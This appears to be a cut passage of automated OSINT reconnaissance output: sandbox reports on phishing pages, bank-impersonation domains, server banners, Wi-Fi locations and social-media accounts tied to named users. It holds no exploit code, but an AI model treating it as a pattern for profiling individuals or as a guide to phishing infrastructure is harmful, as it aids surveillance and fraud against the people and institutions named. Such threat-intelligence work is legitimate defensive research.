"_9BCAD633-ED33-11ED-AF92-080027E5BD4D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "urlref_httpsabhishek1380.github.ioNetflix-Frontend-Project" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text"- [targetUID: N/A]\n "HCU34F34.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HCU34F34.txt]- [targetUID: 00000000-00002616]\n "TD2MCBFO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TD2MCBFO.txt]- [targetUID: 00000000-00002616]\n "EB26P1IH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EB26P1IH.txt]- [targetUID: 00000000-00002616]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "8FTZCXYZ.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8FTZCXYZ.txt]- [targetUID: 00000000-00002616]\n "B31AG3IY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B31AG3IY.txt]- [targetUID: 00000000-00002616]\n "TJ5CILZ1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TJ5CILZ1.txt]- [targetUID: 00000000-00002616]\n "G8QJ0SC2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\G8QJ0SC2.txt]- [targetUID: 0000000 | 185.199.108.153 |
| 2023-05-12 02:51:20 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://devzorro.github.io/demo1/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_88c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_88c_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_88c_IESQMMUTEX_0_303"\n "IsoScope_88c_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2188"\n "IsoScope_88c_ConnHashTable<2188>_HashTable_Mutex"\n "IsoScope_88c_IE_EarlyTabStart_0xa40_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "172.64.132.15:443"\n "104.16.125.175:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"devzorro.github.io"\n "unpkg.com"\n "use.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "Watch right on Netflix.com" (Indicator: "dir "; File: "demo1_1_.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced" and extension "png"\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced" and extension "png"\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fa-brands-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "boxicons.min_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002188]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFB3698290328633A5.TMP" has type "data"- Location: [%TEMP%\\~DFB3698290328633A5.TMP]- [targetUID: 00000000-00002188]\n "~DF08D0DEEEA8775443.TMP" has type "data"- Location: [%TEMP%\\~DF08D0DEEEA8775443.TMP]- [targetUID: 00000000-00002188]\n "~DFEFD9D7D050C84F09.TMP" has type "data"- Location: [%TEMP%\\~DFEFD9D7D050C84F09.TMP]- [targetUID: 00000000-00002188]\n "~DF1CED845D1AE7C7AB.TMP" has type "data"- Location: [%TEMP%\\~DF1CED845D1AE7C7AB.TMP]- [targetUID: 00000000-00002188]\n "urlref_httpsdevzorro.github.iodemo1" has type "HTML document ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "RecoveryStore._01777013-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_01777015-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_0A852BEA-EEB8-11ED-AF43-08002754F18E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "TPX6WOF4.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPX6WOF4.txt]- [targetUID: 00000000-00000320]\n "SP630GNI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SP630GNI.txt]- [targetUID: 00000000-00002188]\n "0JNDWEOT.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0JNDWEOT.txt]- [targetUID: 00000000-00002188]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "33BO4OX0.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\33BO4OX0.txt]- [targetUID: 00000000-00000320]\n "RGNEU2Q5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RGNEU2Q5.txt]- [targetUID: 00000000-00002188]\n "6VXVL4WU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6VXVL4WU.txt]- [targetUID: 00000000-00002188]\n "O4HTUQAC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\O4HTUQAC.txt]- [targetUID: 00000000-00002188]\n "demo1_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://devzorro.github.io/demo1/"\n Pattern match: "https://devzorro.github.io"\n Pattern match: "https://devzorro.github.io/demo1"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "mzjdL.VS/oLORCm/~H.c0KNw&FGk~Z2C3[f"\n Pattern match: "https://fontawesome.comVersion"\n Pattern match: "https://use.fontawesome.com/releases/v5.8.2/css/all.css"\n Pattern match: "SUIDmicrosoft.com/921617645178883103212286350027031032005MUID0BE6741FADBB6D6830696712ACF76C91microsoft.com/102518970071043111047686365652031032005_EDGE_Vmicrosoft.com/921618970071043111047686381277031032005SRCHDAF=NOFORMmicrosoft.com/1024332378944031085610"\n Pattern match: "SUIDmicrosoft.com/921617645178883103212286350027031032005MUID0BE6741FADBB6D6830696712ACF76C91microsoft.com/102518970071043111047686365652031032005SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD"\n Pattern match: "SUIDmicrosoft.com/921617645178883103212286350027031032005SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mic"\n Pattern match: "921618970071043111047686818777031032005MUID0F048E052A046F1F1B669D082B486E59msn.com/102518970071043111047686834402031032005"\n Pattern match: "MUIDB0BE6741FADBB6D6830696712ACF76C91ieonline.microsoft.com/921618970071 | 185.199.108.153 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/patrickpogoda | patrickpogoda |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 4 | 0 | 3 | 0 | None | https://fluid.battleb0t.xyz/dat.gui.min.js | https://fluid.battleb0t.xyz/ |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.2): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5b5dccec8f8690-ORD
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:46:43 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [34.74.170.74] | 34.74.170.74 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTqYgQBna (Net ID: 18:9C:27:26:52:F0) | 37.751, -97.822 |
| 2023-05-12 03:16:28 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 3 | 0 | None | {u'region_code': u'HE', u'country_tld': u'.de', u'ip': u'165.232.113.85', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 82927922, u'country_code': u'DE', u'timezone': u'Europe/Berlin', u'city': u'Frankfurt am Main', u'network': u'165.232.112.0/20', u'languages': u'de', u'version': u'IPv4', u'latitude': 50.113381, u'in_eu': True, u'utc_offset': u'+0200', u'continent_code': u'EU', u'country_name': u'Germany', u'country_capital': u'Berlin', u'org': u'DIGITALOCEAN-ASN', u'postal': u'60311', u'asn': u'AS14061', u'country': u'DE', u'region': u'Hesse', u'longitude': 8.671931, u'country_calling_code': u'+49', u'country_area': 357021.0, u'country_code_iso3': u'DEU'} | 165.232.113.85 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Twitter (Category: social)
https://twitter.com/dawidsulej | dawidsulej |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 64.226.81.43 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 75 | 0 | 2 | 0 | None | 104.196.30.220 | pics.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:54:20) | 41.8781, -87.6298 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Steam (Category: gaming)
https://steamcommunity.com/id/login | login |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | imgur (Category: images)
https://imgur.com/user/ayhu/about | ayhu |
| 2023-05-12 03:03:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 006blog.github.io |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Newport (Net ID: 00:18:E7:CB:EB:02) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Pauwels (Net ID: 00:03:6D:F4:D7:4E) | 50.8897, 6.0563 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8880 | 188.114.97.1 |
| 2023-05-12 03:24:19 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/baptistevauthey/ | baptistevauthey |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | umac-128@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", "mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000000jihyun.github.io |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | permissions-policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | YouTube User2 (Category: video)
https://www.youtube.com/@ayhu | ayhu |
| 2023-05-12 02:44:20 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 02:56:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://cutt.us/yyvbx', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/4734369bf3fe4ba18a65bca9399741ce?shared', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.94.37.140:443"\n "52.217.107.204:443"\n "35.229.48.116:443"\n "104.16.124.175:443"\n "54.147.12.123:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"lor.instructure.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b30_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_b30_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b30_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2864"\n "IsoScope_b30_IE_EarlyTabStart_0xfd8_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_b30_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_b30_ConnHashTable<2864>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b30_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b30_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/4734369bf3fe4ba18a65bca9399741ce?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: 